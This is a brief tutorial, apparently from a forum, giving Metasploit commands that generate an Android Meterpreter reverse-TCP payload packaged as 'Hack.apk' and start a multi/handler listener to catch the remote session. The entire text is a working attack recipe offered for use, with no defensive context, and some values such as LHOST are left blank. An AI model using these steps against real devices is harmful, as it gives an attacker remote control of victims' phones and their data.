Open CMD and type this:
1.msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R>Hack.apk
2.After done close the cmd
3.Refresh the desktop
Open new CMD and type:
1.msfconsole
2.use exploit/multi/handler
3.set payload android/meterpreter/reverse_tcp
4.set LHOST
5.set LPORT 4444
6.exploit